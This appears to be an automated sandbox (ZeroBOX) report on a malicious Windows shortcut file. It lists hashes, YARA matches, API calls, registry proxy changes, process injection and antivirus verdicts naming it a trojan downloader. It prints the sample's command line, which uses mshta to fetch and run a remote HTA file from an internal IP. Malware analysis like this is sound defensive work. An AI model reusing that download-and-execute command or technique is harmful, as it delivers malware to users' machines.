Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Aug. 12, 2024, 10:42 a.m.	Aug. 12, 2024, 10:45 a.m.

Size	471.0B
Type	MS Windows shortcut, Item id list present, Points to a file or directory, Has Working directory, Has command line arguments, Icon number=0, ctime=Tue Jan 16 01:48:07 1601, mtime=Tue Jan 16 01:48:07 1601, atime=Tue Jan 16 01:48:07 1601, length=0, window=hidenormalshowminimized
MD5	`a30762f283cb411be8f4ffaa2e183c4d`
SHA256	`54c950899dbd8a02de99cb62f1dd5aeddc8fcaaf488f7f207e7871156d761083`
CRC32	`5CA1179F`
ssdeep	`6:4xt4/djjsT2FPr13RXXYhLwljAlltERueE8n+SkyGkRkTKlQyDdNdT8Jm7n+Sky1:8eoiPr13huQjAWuR8+UUyDh8I7+Uc6`
Yara	lnk_file_format - Microsoft Windows Shortcut File Format Lnk_Format_Zero - LNK Format Generic_Malware_Zero - Generic Malware

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

No Suricata Alerts

No Suricata TLS

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 12, 2024, 10:42 a.m.		1	1	0

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Aug. 12, 2024, 10:42 a.m.	process_identifier: 292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74052000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory Aug. 12, 2024, 10:42 a.m.	process_identifier: 292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73b33000 process_handle: 0xffffffff	1	0	0

file	C:\Users\test22\AppData\Local\Temp\Director.txt.lnk

cmdline	"C:\Windows\System32\cmd.exe" /c mshta.exe http://192.168.207.2/Director.hta
cmdline	mshta.exe http://192.168.207.2/Director.hta

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Aug. 12, 2024, 10:43 a.m.	process_identifier: 292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef80000 process_handle: 0xffffffff	1	0	0

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA Aug. 12, 2024, 10:42 a.m.	key_handle: 0x000002d4 regkey_r: ProxyEnable reg_type: 4 (REG_DWORD) value: 0 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable	1	0	0

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA Aug. 12, 2024, 10:42 a.m.	key_handle: 0x000002d4 regkey_r: ProxyOverride reg_type: 1 (REG_SZ) value: 127.0.0.1:16107; regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride	1	0	0

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3040 resumed a thread in remote process 2200
NtResumeThread Aug. 12, 2024, 10:42 a.m.	thread_handle: 0x00000338 suspend_count: 1 process_identifier: 2200	1	0	0

Lionic	Trojan.WinLNK.Nioc.4!c
VIPRE	Heur.BZC.YAX.Nioc.1.0A7EF40E
Sangfor	Suspicious.Win32.Save.a
Arcabit	Heur.BZC.YAX.Nioc.1.0A2AFAB0 [many]
Symantec	Trojan.Gen.NPE.C
ESET-NOD32	LNK/TrojanDownloader.Agent.AVD
Avast	Other:Malware-gen [Trj]
Kaspersky	HEUR:Trojan.WinLNK.Agent.gen
BitDefender	Heur.BZC.YAX.Nioc.1.0A7EF40E
MicroWorld-eScan	Heur.BZC.YAX.Nioc.1.0A7EF40E
Rising	Downloader.Mshta/LNK!1.BADA (CLASSIC)
Emsisoft	Heur.BZC.YAX.Nioc.1.0A7EF40E (B)
FireEye	Heur.BZC.YAX.Nioc.1.0A7EF40E
Sophos	Troj/DownLnk-X
SentinelOne	Static AI - Suspicious LNK
Google	Detected
MAX	malware (ai score=83)
Kingsoft	Win32.Troj.Undef.a
Microsoft	Trojan:Script/Wacatac.B!ml
ZoneAlarm	HEUR:Trojan.WinLNK.Agent.gen
GData	Heur.BZC.YAX.Nioc.1.11B631AB
VBA32	Trojan.Link.CmdRunner
Tencent	Win32.Trojan-Downloader.Der.Uwhl
huorong	TrojanDownloader/LNK.Agent.cr
AVG	Other:Malware-gen [Trj]

dead_host

192.168.207.2:80

Director.txt.lnk